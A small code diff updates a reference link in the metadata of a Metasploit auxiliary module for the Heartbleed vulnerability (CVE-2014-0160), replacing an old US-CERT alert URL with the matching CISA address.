@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
         [
           [ 'CVE', '2014-0160' ],
           [ 'US-CERT-VU', '720951' ],
-          [ 'URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A' ],
+          [ 'URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA14-098A' ],
           [ 'URL', 'http://heartbleed.com/' ]
         ],
       'DisclosureDate' => 'Apr 07 2014',
